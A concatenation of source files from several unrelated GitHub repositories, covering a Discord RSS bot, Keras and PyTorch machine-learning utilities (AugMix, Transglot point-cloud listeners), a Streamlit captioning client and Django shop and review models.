updated_insec = calendar.timegm(sttime) - shiftsec
print ("updated, since = ",updated_insec, lastcheck)
if updated_insec < int(lastcheck):
return False
else:
return True
#######################
##### Others #########
@bot.command()
async def test():
"""command for test and debug"""
await bot.say("RSS test started.")
await checkRSS(bot)
@bot.command(pass_context=True)
async def b(ctx):
"""command for Birthday Wish"""
command,name = ctx.message.content.split(' ')
await bot.say("Happy Birthday to **" + name + "**! :cactus: :tada:")
######################################
loop = asyncio.get_event_loop()
try:
loop.create_task(checkRSS(bot))
loop.run_until_complete(bot.start(CactusConsts.CactusBot_Token))
except KeyboardInterrupt:
print("KeyboardInterrupt")
except Exception as e:
print(e.args)
finally:
loop.run_until_complete(bot.logout())
# cancel all tasks lingering
tasks = asyncio.Task.all_tasks(loop)
for task in tasks:
task.cancel()
loop.close()
if g_session:
g_session.close()
``` |
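`read_rssfile` and `write_rssfile` above round-trip one comma-separated line per feed, in the key order given by `g_RSSdictkey`. A sample line and how it parses (all IDs below are made-up placeholders):
```python
RSS_KEYS = ["index", "url", "lastModified", "eTag", "lastcheck", "channel_ID", "userID"]

# One entry of the RSSdata file: index, feed URL, caching headers (may be empty),
# last-check epoch seconds, target channel ID, requesting user ID.
line = "1,https://www.reddit.com/r/python/.rss,,,1480000000,123456789012345678,876543210987654321"
entry = dict(zip(RSS_KEYS, line.strip().split(',')))
print(entry["url"], entry["channel_ID"])
```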
{
"source": "636/keras_utility",
"score": 2
} |
#### File: keras_utility/keras_utility/trainer.py
```python
import logging
from typing import Callable, Generator, List, Union, Tuple
import tensorflow as tf
from keras import backend as K
from keras.models import Model
from keras.utils import multi_gpu_model
LOGGER = logging.getLogger(__name__)
# A DatasetLoader returns (steps_per_epoch, batch generator) when called.
DatasetLoader = Callable[[], Tuple[int, Generator]]
class KerasTrainer():
logger = LOGGER.getChild('KerasTrainer')
def __init__(self, worker=10, callbacks=[]):
self.worker = worker
self.callbacks = callbacks
def train(self,
model,
train_loader: DatasetLoader,
val_loader: DatasetLoader,
epochs: int,
callbacks=[]) -> Tuple[Model, dict]:
_train_step, _train_loader = train_loader()
self.logger.info('epoch: %s, train_step: %s',
epochs, _train_step)
model.summary(print_fn=self.logger.info)
_options = {
'verbose': 1,
'callbacks': self.callbacks + callbacks,
'workers': self.worker
}
if val_loader:
_val_step, _val_loader = val_loader()
self.logger.info('val_step: %s', _val_step)
_options.update({
'validation_data': _val_loader,
'validation_steps': _val_step,
})
self.logger.info('training start.')
history = model.fit_generator(_train_loader,
_train_step,
epochs,
**_options)
self.logger.info('training end.')
return model, history
@classmethod
def apply_multi_gpu_if_available(cls, model_builder: Callable, freeze: Callable = lambda x: x):
"""
# return
[is_multi: Bool, applyed multi gpu model, original model]
"""
gpu_count = len(
[x for x in [x.name for x in K.get_session().list_devices()] if 'gpu' in x.lower()])
cls.logger.info('available gpu count: %s', gpu_count)
is_multi = False
if gpu_count > 1:
cls.logger.info('apply multi gpu mode.')
with tf.device('/cpu:0'):
original_model = model_builder()
original_model = freeze(original_model)
model = multi_gpu_model(original_model)
is_multi = True
else:
cls.logger.info(
'not apply multi gpu. single gpu mode or cpu mode.')
original_model = model_builder()
original_model = freeze(original_model)
model = original_model
return is_multi, model, original_model
``` |
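`KerasTrainer.train` expects each loader argument to be a zero-argument callable returning `(steps_per_epoch, generator)`. A minimal loader sketch over in-memory arrays (the array names and batch size are placeholders):
```python
import numpy as np

def make_array_loader(x, y, batch_size=32):
    """Return a DatasetLoader: () -> (steps_per_epoch, endless batch generator)."""
    steps = int(np.ceil(len(x) / batch_size))

    def loader():
        def generator():
            while True:                          # fit_generator expects an endless generator
                for i in range(steps):
                    sl = slice(i * batch_size, (i + 1) * batch_size)
                    yield x[sl], y[sl]
        return steps, generator()

    return loader

# usage sketch: trainer.train(model, make_array_loader(x_train, y_train),
#                             make_array_loader(x_val, y_val), epochs=10)
```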
{
"source": "636/python3_invoker",
"score": 2
} |
#### File: python3_invoker/invoker/__init__.py
```python
import importlib
import logging
import logging.config
import os
import re
import sys
from collections.abc import Mapping
from logging import Logger
from pathlib import Path
from typing import Callable, Dict, List, Tuple
import yaml
from injector import Binder, Injector, Key, singleton
from invoker.utils import AliasDict, split_qualified_name
LOGGER = logging.getLogger(__name__)
InvokeConfig = Key('InvokeConfig') # type: AliasDict
InvokeOptions = Key('InvokeOptions') # type: Dict
class InvokerContext():
logger = LOGGER.getChild('InvokerContext') # type: Logger
IS_ALREADY_LOADED_LOGGING = False
@classmethod
def set_logging_config(cls, logging_config_file: Path):
if cls.IS_ALREADY_LOADED_LOGGING:
cls.logger.warning(
                'already initialized logging configuration. skip.')
else:
            cls.logger.info('initialize logging configuration. start')
with logging_config_file.open('r', encoding='utf-8') as f:
config = yaml.load(f)
logging.config.dictConfig(config)
cls.IS_ALREADY_LOADED_LOGGING = True
cls.logger.info(
                'initialize logging configuration. end: \n%s', config)
def __init__(self, config_file_list: List[Path],
logging_config_path: Path = None):
if logging_config_path:
self.set_logging_config(logging_config_path)
# logging default setting.
config = AliasDict({})
for c_file in config_file_list:
cl = AliasDict.load_from_yaml(c_file)
config.update(cl)
self.app_config = config
self.injector = Injector(modules=[self._injector_bind]) # type: Injector
self.invoke_options = None
def _injector_bind(self, binder: Binder):
binder.bind(InvokeConfig, to=self.app_config, scope=singleton)
def invoke(self, invoke_options: Dict):
self.invoke_options = invoke_options
self.injector.binder.bind(InvokeOptions, to=self.invoke_options, scope=singleton)
_package, _callable = split_qualified_name(invoke_options['invoke'])
self.logger.debug('calleble: %s, package: %s', _callable, _package)
self.logger.debug('cwd: %s', os.getcwd())
sys.path.append(os.getcwd())
self.logger.debug('sys.path: \n %s', '\n '.join(sys.path))
_func = getattr(importlib.import_module(_package), _callable) # type: Callable
kwargs = invoke_options.get('args', {})
try:
return self._invoke(_func, args=[], kwargs=kwargs)
except Exception as e:
self.logger.exception('invoke function internal error.')
sys.exit(10)
def _invoke(self, func: Callable, args: Tuple, kwargs: Dict) -> any:
self.logger.info('func: %s args: %s, kwargs: %s', func, args, kwargs)
return self.injector.call_with_injection(func,
args=args,
kwargs=kwargs)
```
#### File: python3_invoker/sample/sample.py
```python
import logging
from injector import inject
from invoker import InvokeConfig
LOGGER = logging.getLogger(__name__)
@inject
def sample_function(config: InvokeConfig,
key: str):
LOGGER.info('key: %s, value: %s', key, config.get(key))
LOGGER.info('config: %s', config)
``` |
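Putting the two files together: `InvokerContext.invoke` takes an options dict whose `invoke` key is a fully qualified callable name and whose `args` key holds keyword arguments, while injected parameters such as `InvokeConfig` are filled in by the injector. A hedged usage sketch (the config file names and the qualified name are assumptions based on the sample layout):
```python
from pathlib import Path
from invoker import InvokerContext

context = InvokerContext(
    config_file_list=[Path('config.yml')],          # merged into InvokeConfig
    logging_config_path=Path('logging.yml'))

# Calls sample_function(config=<injected InvokeConfig>, key='greeting').
context.invoke({
    'invoke': 'sample.sample.sample_function',
    'args': {'key': 'greeting'},
})
```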
{
"source": "6390wer/captionify",
"score": 3
} |
#### File: captionify/streamlit/ui.py
```python
import streamlit as st
from requests_toolbelt.multipart.encoder import MultipartEncoder
import requests
from PIL import Image
import io
st.title('Caption Generator')
# fastapi endpoint
url = 'http://fastapi:8000'
endpoint = '/caption'
st.write('''Generate brief caption of the selected image.
This streamlit example uses a FastAPI service as backend.
Visit this URL at `:8000/docs` for FastAPI documentation.''') # description and instructions
image = st.file_uploader('insert image') # image upload widget
def process(image, server_url: str):
m = MultipartEncoder(
fields={'file': ('filename', image, 'image/jpeg')}
)
r = requests.post(server_url,data=m,headers={'Content-Type': m.content_type},
timeout=800000)
return r
if st.button('Get caption'):
if image is None:
st.write("Insert an image!") # handle case with no image
else:
caption = process(image, url+endpoint)
print(caption)
        st.image([image], width=300)  # display the uploaded image
st.write(caption.content)
``` |
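The client above posts the image as a multipart field named `file` to the `/caption` endpoint and shows the raw response body. One way the FastAPI side of that contract could look (this is an assumption about the backend, which is not included here):
```python
from fastapi import FastAPI, File, UploadFile

app = FastAPI()

def run_captioning_model(image_bytes: bytes) -> str:
    # Placeholder for whatever captioning model the service actually wraps.
    return 'a caption'

@app.post('/caption')
async def caption(file: UploadFile = File(...)):
    image_bytes = await file.read()
    return {'caption': run_captioning_model(image_bytes)}
```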
{
"source": "63days/augmix",
"score": 2
} |
#### File: 63days/augmix/augmix.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
from augmentations import *
from torch.distributions.dirichlet import Dirichlet
from torch.distributions.beta import Beta
#dv = 'cuda' if torch.cuda.is_available() else 'cpu'
class AugMixDataset(torch.utils.data.Dataset):
def __init__(self, dataset, preprocess, no_jsd=False):
super(AugMixDataset, self).__init__()
self.dataset = dataset
self.preprocess = preprocess
self.no_jsd = no_jsd
self.aug = AugMix()
def __getitem__(self, i):
x, y = self.dataset[i]
if self.no_jsd:
return self.preprocess(x), y
else:
aug1 = self.aug.augment_and_mix(x, self.preprocess)
aug2 = self.aug.augment_and_mix(x, self.preprocess)
return (self.preprocess(x), aug1, aug2), y
def __len__(self):
return len(self.dataset)
class AugMix(nn.Module):
def __init__(self, k=3, alpha=1, severity=3):
super(AugMix, self).__init__()
self.k = k
self.alpha = alpha
self.severity = severity
self.dirichlet = Dirichlet(torch.full(torch.Size([k]), alpha, dtype=torch.float32))
self.beta = Beta(alpha, alpha)
self.augs = augmentations
self.kl = nn.KLDivLoss(reduction='batchmean')
def augment_and_mix(self, images, preprocess):
'''
Args:
images: PIL Image
preprocess: transform[ToTensor, Normalize]
Returns: AugmentAndMix Tensor
'''
mix = torch.zeros_like(preprocess(images))
w = self.dirichlet.sample()
for i in range(self.k):
aug = images.copy()
depth = np.random.randint(1, 4)
for _ in range(depth):
op = np.random.choice(self.augs)
aug = op(aug, 3)
mix = mix + w[i] * preprocess(aug)
m = self.beta.sample()
augmix = m * preprocess(images) + (1 - m) * mix
return augmix
def jensen_shannon(self, logits_o, logits_1, logits_2):
p_o = F.softmax(logits_o, dim=1)
p_1 = F.softmax(logits_1, dim=1)
p_2 = F.softmax(logits_2, dim=1)
# kl(q.log(), p) -> KL(p, q)
M = torch.clamp((p_o + p_1 + p_2) / 3, 1e-7, 1) # to avoid exploding
js = (self.kl(M.log(), p_o) + self.kl(M.log(), p_1) + self.kl(M.log(), p_2)) / 3
return js
``` |
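With `no_jsd=False`, each `AugMixDataset` item is a triple of the clean image and two independent AugMix views; the usual recipe pairs cross-entropy on the clean view with a weighted Jensen-Shannon consistency term computed by `jensen_shannon`. A hedged training-loop sketch (`model`, `optimizer`, `loader`, and the weight `lam` are placeholders; 12 is a common choice rather than anything fixed by this file):
```python
# Sketch: `model`, `optimizer`, and `loader` (built on AugMixDataset) are assumed to exist.
import torch.nn.functional as F

augmix = AugMix()
lam = 12.0                                   # consistency weight (assumed)

for (x_clean, x_aug1, x_aug2), y in loader:
    logits_clean = model(x_clean)
    logits_aug1 = model(x_aug1)
    logits_aug2 = model(x_aug2)

    loss = F.cross_entropy(logits_clean, y)
    loss = loss + lam * augmix.jensen_shannon(logits_clean, logits_aug1, logits_aug2)

    optimizer.zero_grad()
    loss.backward()
    optimizer.step()
```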
{
"source": "63days/Transglot",
"score": 2
} |
#### File: transglot/in_out/shapeglot_dataset.py
```python
import numpy as np
from torch.utils.data import Dataset
import h5py
import os.path as osp
import torch
class ShapeglotDataset(Dataset):
def __init__(self, np_data, shuffle_geo=False, target_last=False):
"""
:param np_data:
:param shuffle_geo: if True, the positions of the shapes in context are randomly swapped.
"""
super(ShapeglotDataset, self).__init__()
self.data = np_data
self.shuffle_geo = shuffle_geo
self.target_last = target_last
def __getitem__(self, index):
text = self.data['text'][index].astype(np.long)
geos = self.data['in_geo'][index].astype(np.long)
target = self.data['target'][index]
idx = np.arange(len(geos))
if self.shuffle_geo:
np.random.shuffle(idx)
geos = geos[idx]
target = np.argmax(target[idx])
if self.target_last:
last = geos[-1]
geos[-1] = geos[target]
geos[target] = last
target = len(geos) - 1
return geos, target, text
def __len__(self):
return len(self.data)
class ShapeglotWithPCDataset(ShapeglotDataset):
def __init__(self, np_data, num_points=2048, shuffle_geo=False, target_last=False):
super().__init__(np_data=np_data, shuffle_geo=shuffle_geo, target_last=target_last)
self.num_points = num_points
cur_dir = osp.dirname(__file__)
self.pc_data = h5py.File(osp.join(cur_dir, '../../data/shapenet_chairs_only_in_game.h5'), 'r')['data'][:,:self.num_points]
def __getitem__(self, index):
text = self.data['text'][index].astype(np.long)
geos_idx = self.data['in_geo'][index].astype(np.long)
geos = self.pc_data[geos_idx]
target = self.data['target'][index]
idx = np.arange(len(geos))
if self.shuffle_geo:
np.random.shuffle(idx)
geos = torch.from_numpy(geos[idx]).float()
geos_idx = geos_idx[idx]
target = np.argmax(target[idx])
if self.target_last:
last = geos[-1]
last_idx = geos_idx[-1]
geos[-1] = geos[target]
geos_idx[-1] = geos_idx[target]
geos[target] = last
            geos_idx[target] = last_idx
target = len(geos) - 1
return geos, geos_idx, target, text
```
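Each item from `ShapeglotWithPCDataset` is `(point_clouds, shape_ids, target_index, token_ids)` for one game round with three candidate shapes. A minimal loading sketch (`np_data` is assumed to be one split of the preprocessed game data):
```python
from torch.utils.data import DataLoader

dataset = ShapeglotWithPCDataset(np_data, num_points=2048, shuffle_geo=True)
loader = DataLoader(dataset, batch_size=32, shuffle=True, num_workers=4)

for geos, geos_idx, target, text in loader:
    # geos: [B, 3, num_points, 3] point clouds, target: index of the referred shape,
    # text: padded utterance token ids.
    break
```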
#### File: transglot/models/listener.py
```python
import torch
import torch.nn.functional as F
import pytorch_lightning as pl
from torch.utils.data import DataLoader
import os.path as osp
from transglot.models.point_encoder.pointnet import *
from transglot.models.point_encoder.pointnet2 import *
from transglot.models.point_encoder.point_transformer import PT
from transglot.models.point_encoder.pct import PCT
from transglot.models.encoders import LanguageEncoder, PretrainedFeatures
from transglot.models.neural_utils import MLPDecoder, smoothed_cross_entropy, MultiHeadAttention
from transglot.in_out.geometry import vgg_image_features, pc_ae_features
from transglot.in_out.shapeglot_dataset import ShapeglotWithPCDataset
from transglot.in_out.rnn_data_preprocessing import make_dataset_for_rnn_based_model
from transglot.simple_utils import unpickle_data
class BaseListener(pl.LightningModule):
def __init__(self, hparams):
super().__init__()
self.hparams = hparams
self._build_model()
self.incorrect_indices = []
def _build_model(self):
raise NotImplementedError
def forward(self, chairs, chairs_idx, tokens, dropout_rate=0.5):
raise NotImplementedError
def training_step(self, batch, batch_idx):
chairs, chairs_idx, targets, tokens = batch
outputs = self(chairs, chairs_idx, tokens)
loss = smoothed_cross_entropy(outputs['logits'], targets, 0)
if self.hparams["use_tnet"]:
mat_diff_loss = self.get_align_loss()
loss += 1e-3 * mat_diff_loss
preds = torch.max(outputs['logits'], 1)[1]
acc = (targets == preds).float().mean()
self.log('train_loss', loss, on_step=False, on_epoch=True)
self.log('train_acc', acc * 100, prog_bar=True, on_step=False, on_epoch=True)
return loss
def validation_step(self, batch, batch_idx):
chairs, chairs_idx, targets, tokens = batch
outputs = self(chairs, chairs_idx, tokens)
loss = smoothed_cross_entropy(outputs["logits"], targets, 0)
if self.hparams["use_tnet"]:
mat_diff_loss = self.get_align_loss()
loss += 1e-3 * mat_diff_loss
preds = torch.max(outputs["logits"], 1)[1]
acc = (targets == preds).float().mean()
self.log("val_loss", loss, on_step=False, on_epoch=True)
self.log("val_acc", acc * 100, prog_bar=True, on_step=False, on_epoch=True)
def test_step(self, batch, batch_idx):
chairs, chairs_idx, targets, tokens = batch
outputs = self(chairs, chairs_idx, tokens)
loss = smoothed_cross_entropy(outputs['logits'], targets, 0)
if self.hparams["use_tnet"]:
mat_diff_loss = self.get_align_loss()
loss += 1e-3 * mat_diff_loss
preds = torch.max(outputs['logits'], 1)[1]
check_correct = (targets==preds)
acc = check_correct.float().mean()
incorrect_idx = (check_correct==False).nonzero(as_tuple=True)[0]
incorrect_idx = incorrect_idx + batch_idx * self.hparams["batch_size"]
self.incorrect_indices += incorrect_idx.tolist()
self.log("test_loss", loss, on_step=False, on_epoch=True)
self.log("test_acc", acc * 100, prog_bar=True, on_step=False, on_epoch=True)
def configure_optimizers(self):
if self.hparams["optimizer"] == "adamw":
optimizer = torch.optim.AdamW(self.parameters(), lr=self.hparams["lr"],
weight_decay=self.hparams["weight_decay"])
else:
optimizer = torch.optim.Adam(self.parameters(), lr=self.hparams["lr"])
return optimizer
# return {'optimizer': optimizer,
# 'lr_scheduler': {
# 'scheduler': torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=len(self.train_ds),
# eta_min=0, last_epoch=-1),
# 'interval': 'step',
# 'frequency': 1
# }
# }
def get_align_loss(self):
mat_diff = torch.matmul(self.pc_encoder.transformk, self.pc_encoder.transformk.transpose(1, 2)) - \
torch.eye(64).cuda()
label_mat = torch.eye(64, dtype=torch.float32, device='cuda').expand(mat_diff.size(0), -1, -1)
mat_diff_loss = F.mse_loss(mat_diff, label_mat)
return mat_diff_loss
def prepare_data(self):
cur_dir = osp.dirname(__file__)
top_data_dir = osp.join(cur_dir, '../../data/main_data_for_chairs')
data_name='game_data.pkl'
game_data, word_to_int, int_to_word, int_to_sn_model, sn_model_to_int, sorted_sn_models = \
unpickle_data(osp.join(top_data_dir, data_name))
max_seq_len = 33 # Maximum size (in tokens) per utterance.
split_sizes = [0.8, 0.1, 0.1] # Train-val-test sizes.
random_seed = 2004
unique_test_geo = True # If true, the test/train/val splits have 'targets' that are disjoint sets.
only_correct = True # Drop all not correctly guessed instances.
net_data, split_ids, _, net_data_mask = \
make_dataset_for_rnn_based_model(game_data,
split_sizes,
max_seq_len,
drop_too_long=True,
only_correct=only_correct,
unique_test_geo=unique_test_geo,
replace_not_in_train=True,
geo_condition=None,
bias_train=False,
seed=random_seed,
only_easy=True)
self.train_ds = ShapeglotWithPCDataset(net_data['train'], num_points=self.hparams["num_points"])
self.val_ds = ShapeglotWithPCDataset(net_data['val'], num_points=self.hparams["num_points"])
self.test_ds = ShapeglotWithPCDataset(net_data['test'], num_points=self.hparams["num_points"])
self.int_to_sn_model = int_to_sn_model
self.vocab_size = len(int_to_word)
def _build_dataloader(self, ds, mode):
return DataLoader(ds,
batch_size=self.hparams["batch_size"],
shuffle=mode=='train',
num_workers=4,
pin_memory=True,
drop_last= mode=='train')
def train_dataloader(self):
return self._build_dataloader(self.train_ds, 'train')
def val_dataloader(self):
return self._build_dataloader(self.val_ds, 'val')
def test_dataloader(self):
return self._build_dataloader(self.test_ds, 'test')
def get_progress_bar_dict(self):
items = super().get_progress_bar_dict()
running_train_loss = self.trainer.train_loop.running_loss.mean()
if running_train_loss is not None:
avg_training_loss = running_train_loss.cpu().item()
else:
avg_training_loss = float('NaN')
items['loss'] = f'{avg_training_loss:.4f}'
items.pop('v_num', None)
return items
class Transglot(BaseListener):
def _build_model(self):
self.prepare_data()
self.hidden_dim = self.hparams["hidden_dim"]
attn_dim = self.hidden_dim // 2
self.cross_attn_layers = nn.ModuleList()
for i in range(self.hparams["attn_layers"]):
self.cross_attn_layers.append(MultiHeadAttention(n_head=self.hparams["num_heads"],
query_dim=attn_dim,
point_dim=self.hparams["point_output_dim"],
d_k=attn_dim // self.hparams["num_heads"],
d_v=attn_dim // self.hparams["num_heads"]))
mlp_dim = self.hparams["hidden_dim"]
self.language_encoder_attn = LanguageEncoder(n_hidden=self.hidden_dim//2,
embedding_dim=self.hparams["embedding_dim"],
vocab_size=self.vocab_size)
self.language_encoder_concat = LanguageEncoder(n_hidden=self.hidden_dim//2,
embedding_dim=self.hparams["embedding_dim"],
vocab_size=self.vocab_size)
pc_encoder_type = self.hparams["pc_encoder_type"]
pc_output_dim = self.hparams["point_output_dim"]
if pc_encoder_type == "pn":
self.pc_encoder = PN(output_dim=pc_output_dim)
elif pc_encoder_type == "pn2ssg":
self.pc_encoder = PN2SSG(output_dim=pc_output_dim)
elif pc_encoder_type == "pn2msg":
self.pc_encoder = PN2MSG(output_dim=pc_output_dim)
elif pc_encoder_type == "pt":
self.pc_encoder = PT(output_dim=pc_output_dim)
elif pc_encoder_type == "pct":
self.pc_encoder = PCT(output_dim=pc_output_dim)
if self.hparams["use_image"]:
top_pretrained_feat_dir = "./data/main_data_for_chairs/pretrained_features"
vgg_feats_file = osp.join(top_pretrained_feat_dir, 'shapenet_chair_vgg_fc7_embedding.pkl')
vgg_feats = vgg_image_features(self.int_to_sn_model, 'chair', vgg_feats_file, python2_to_3=True)
self.image_encoder = PretrainedFeatures(torch.Tensor(vgg_feats),
embed_size=self.hidden_dim)
self.logit_encoder = MLPDecoder(in_feat_dims=mlp_dim,
out_channels=[100, 50, 1],
use_b_norm=True)
def forward(self, chairs, chairs_idx, tokens, dropout_rate=0.5):
lang_feats = self.language_encoder_attn(tokens, init_feats=None)
lang_concat_feats = self.language_encoder_concat(tokens, init_feats=None)
# extract point cloud features #
B, k, N, _ = chairs.size()
chairs_group = chairs.contiguous().view(B*k, N, 3)
pc_feats = self.pc_encoder(chairs_group)
pc_feats = pc_feats.contiguous().view(B, k, -1, self.hparams["point_output_dim"]) #[B,3,num_point,point_output_dim]
#################################
logits = []
attn_weights = [[] for _ in range(self.hparams["attn_layers"])] #[i][j]=i-th attn_layer's j-th object
for i, l_feats in enumerate(lang_feats):
l_f_attn = l_feats.unsqueeze(1)
l_f_cat = lang_concat_feats[i]
p_f = pc_feats[:,i]
# Cross Attention j-iteration #
attn_feat = l_f_attn
for j in range(self.hparams["attn_layers"]):
attn_feat, attn_weight = self.cross_attn_layers[j](q=attn_feat,
k=p_f,
v=p_f)
attn_weight = attn_weight.squeeze(2) # [B,num_head,num_points]
attn_weights[j].append(attn_weight)
attn_feat = attn_feat.squeeze(1)
final_feat = torch.cat([l_f_cat, attn_feat], 1)
logits.append(self.logit_encoder(final_feat))
outputs = dict()
outputs["logits"] = torch.cat(logits, 1)
outputs["attn_weights"] = attn_weights
return outputs
class Shapeglot(BaseListener):
def _build_model(self):
self.prepare_data()
top_pretrained_feat_dir = "./data/main_data_for_chairs/pretrained_features"
vgg_feats_file = osp.join(top_pretrained_feat_dir, 'shapenet_chair_vgg_fc7_embedding.pkl')
vgg_feats = vgg_image_features(self.int_to_sn_model, 'chair', vgg_feats_file, python2_to_3=True)
pc_feats_file = osp.join(top_pretrained_feat_dir, 'shapenet_chair_pcae_128bneck_chamfer_embedding.npz')
pc_feats = pc_ae_features(self.int_to_sn_model, pc_feats_file)
if self.hparams["use_image"]:
self.image_encoder = PretrainedFeatures(torch.Tensor(vgg_feats),
embed_size=self.hparams["hidden_dim"])
self.language_encoder = LanguageEncoder(n_hidden=self.hparams["hidden_dim"],
embedding_dim=self.hparams["embedding_dim"],
vocab_size=self.vocab_size)
if self.hparams["pretrained"]:
self.pc_encoder = PretrainedFeatures(torch.Tensor(pc_feats),
embed_size=self.hparams["hidden_dim"])
else:
self.pc_encoder = PNCls(output_dim=self.hparams["point_output_dim"])
self.logit_encoder = MLPDecoder(in_feat_dims=self.hparams["hidden_dim"]*2,
out_channels=[100, 50, 1],
use_b_norm=True)
def forward(self, chair_pcs, chair_ids, padded_tokens, dropout_rate=0.5):
if self.hparams["pretrained"]:
logits = self._forward_pretrained(chair_ids, padded_tokens, dropout_rate)
else:
logits = self._forward_pointnet(chair_pcs, chair_ids, padded_tokens, dropout_rate)
outputs = dict()
outputs["logits"] = logits
return outputs
def _forward_pretrained(self, item_ids, padded_tokens, dropout_rate=0.5):
if self.hparams["use_image"]:
visual_feats = self.image_encoder(item_ids, dropout_rate)
lang_feats = self.language_encoder(padded_tokens, init_feats=visual_feats)
else:
lang_feats = self.language_encoder(padded_tokens, init_feats=None)
pc_feats = self.pc_encoder(item_ids, dropout_rate, pre_drop=False)
logits = []
for i, l_feats in enumerate(lang_feats):
if pc_feats is not None:
feats = torch.cat([l_feats, pc_feats[:, i]], 1)
else:
feats = l_feats
logits.append(self.logit_encoder(feats))
return torch.cat(logits, 1)
def _forward_pointnet(self, chair_pcs, chair_ids, padded_tokens, dropout_rate=0.5):
if self.hparams["use_image"]:
visual_feats = self.image_encoder(chair_ids, dropout_rate)
lang_feats = self.language_encoder(padded_tokens, init_feats=visual_feats)
else:
lang_feats = self.language_encoder(padded_tokens, init_feats=None)
B, k, N, _ = chair_pcs.size()
chairs_group = chair_pcs.contiguous().view(B * k, N, 3)
pc_feats = self.pc_encoder(chairs_group)
pc_feats = pc_feats.reshape(B, k, -1)
logits = []
for i, l_feats in enumerate(lang_feats):
feats = torch.cat([l_feats, pc_feats[:, i]], 1)
logits.append(self.logit_encoder(feats))
return torch.cat(logits, 1)
```
#### File: models/point_encoder/pct.py
```python
import torch
import torch.nn as nn
import math
class PCT(nn.Module):
def __init__(self, output_dim):
super().__init__()
self.input_embedding = NeighborEmbedding(3, 128, 16)
self.sa1 = OA(128)
self.sa2 = OA(128)
self.sa3 = OA(128)
self.sa4 = OA(128)
self.conv_fuse = nn.Sequential(
nn.Conv1d(4*128, 1024, 1),
nn.BatchNorm1d(1024),
nn.LeakyReLU(negative_slope=0.2)
)
self.convs1 = nn.Sequential(
nn.Conv1d(1024*3, 512, 1),
nn.BatchNorm1d(512),
nn.ReLU(),
nn.Dropout(0.5)
)
self.convs2 = nn.Sequential(
nn.Conv1d(512, 256, 1),
nn.BatchNorm1d(256),
nn.ReLU(),
nn.Conv1d(256, output_dim, 1)
)
def forward(self, x):
B,N,_=x.size()
x = self.input_embedding(x)
x1, attn1 = self.sa1(x)
x2, attn2 = self.sa2(x1)
x3, attn3 = self.sa3(x2)
x4, attn4 = self.sa4(x3)
x = torch.cat([x1, x2, x3, x4], dim=-1)
x = self.conv_fuse(x.transpose(1,2))
x_max = x.max(2)[0].unsqueeze(-1).repeat(1,1,N)
x_avg = x.mean(2).unsqueeze(-1).repeat(1,1,N)
x = torch.cat([x, x_max, x_avg], dim=1)
x = self.convs1(x)
x = self.convs2(x)
return x.transpose(1,2) #B,N,C
class NaiveEmbedding(nn.Module):
def __init__(self, input_dim, output_dim=128):
super().__init__()
self.mlp = nn.Sequential(
nn.Conv1d(input_dim, output_dim, 1),
nn.BatchNorm1d(output_dim),
nn.ReLU(True),
nn.Conv1d(output_dim, output_dim, 1),
nn.BatchNorm1d(output_dim),
nn.ReLU(True)
)
def forward(self, x):
return self.mlp(x.transpose(1,2)).transpose(1,2).contiguous()
class NeighborEmbedding(NaiveEmbedding):
def __init__(self, input_dim, output_dim=128, k=32):
super().__init__(input_dim, output_dim//2)
self.k = k
self.local_op = nn.Sequential(
nn.Conv1d(output_dim, output_dim, 1, bias=False),
nn.BatchNorm1d(output_dim),
nn.ReLU(),
nn.Conv1d(output_dim, output_dim, 1, bias=False),
nn.BatchNorm1d(output_dim),
nn.ReLU()
)
def forward(self, x):
xyz = x
x = self.mlp(x.transpose(1,2)).transpose(1,2).contiguous() #BND
x_repeat = x.unsqueeze(2).expand(-1,-1,self.k,-1) #BNkD
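        # kNN_torch and gather_knn are k-nearest-neighbour helpers; they are not
        # imported in this file and are assumed to be provided elsewhere in the repo.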
knn_idx = kNN_torch(xyz, xyz, k=self.k) # BNk
knn_x = gather_knn(x, knn_idx) # BNkD
x = knn_x - x_repeat
x = torch.cat([x, x_repeat], dim=-1) #B N k 2D
B, N, k, D = x.size()
x = x.transpose(2,3).reshape(-1, D, k) # B*N D k
x = self.local_op(x).reshape(B, N, D, k)
x = x.max(-1)[0] # B N D
return x
class SA(nn.Module):
def __init__(self, dim):
super().__init__()
self.to_q = nn.Linear(dim, dim//4)
self.to_k = nn.Linear(dim, dim//4)
self.to_v = nn.Linear(dim, dim)
self.lbr = nn.Sequential(
nn.Conv1d(dim, dim, 1),
nn.BatchNorm1d(dim),
nn.ReLU(True)
)
def forward(self, x):
q = self.to_q(x)
k = self.to_k(x)
v = self.to_v(x)
attn_weights = torch.einsum('bnd,bmd->bnm', q, k) / math.sqrt(q.size(-1))
attn_weights = torch.softmax(attn_weights, -1)
attn = torch.einsum('bnm,bmd->bnd', attn_weights, v)
return self.lbr(attn.transpose(1,2)).transpose(1,2).contiguous() + x, attn_weights
class OA(SA):
def __init__(self, dim):
super().__init__(dim)
def forward(self, x):
q = self.to_q(x)
k = self.to_k(x)
v = self.to_v(x)
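        # Offset-attention normalization (as in the PCT paper): softmax over the
        # query axis, then L1-normalize over the key axis; the LBR block below is
        # applied to the offset (x - attn) before the residual connection.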
attn_weights = torch.einsum('bnd,bmd->bnm', q, k)
attn_weights = torch.softmax(attn_weights, dim=1)
attn_weights = attn_weights / (1e-9 + torch.sum(attn_weights, 2, keepdim=True))
attn = torch.einsum('bnm,bmd->bnd', attn_weights, v)
return self.lbr((x-attn).transpose(1, 2)).transpose(1, 2).contiguous() + x, attn_weights
``` |
{
"source": "63phc/lks",
"score": 2
} |
#### File: apps/reviews/models.py
```python
from django.utils.translation import gettext_lazy as _
from django.db import models
from src.core.mixins.mixin import ImagesMixin
class Review(ImagesMixin):
title = models.CharField(_("Title"), max_length=63)
author = models.CharField(_("Author review"), max_length=63)
comment = models.CharField(_("Comment"), max_length=263)
email = models.EmailField(_("Email"), blank=True, null=True)
rating = models.PositiveSmallIntegerField(_("Rating"))
is_active = models.BooleanField(_("Active"), default=True)
created_at = models.DateTimeField(_("Created at"), auto_now_add=True)
class Meta:
verbose_name = _("Review")
verbose_name_plural = _("Reviews")
ordering = ("-created_at",)
def __str__(self):
return self.author
```
#### File: shop/models/category.py
```python
from django.db import models
from django.utils.translation import gettext_lazy as _
from django_extensions.db.fields import AutoSlugField
from src.core.mixins.mixin import SeoMixin
class Category(SeoMixin):
title = models.CharField(_("Title"), max_length=120)
slug = AutoSlugField(_("slug"), populate_from="title", editable=True)
class Meta:
verbose_name = _("Category")
verbose_name_plural = _("Categories")
def __str__(self):
return self.title
```
#### File: apps/shop/viewsets.py
```python
from rest_framework import status, mixins
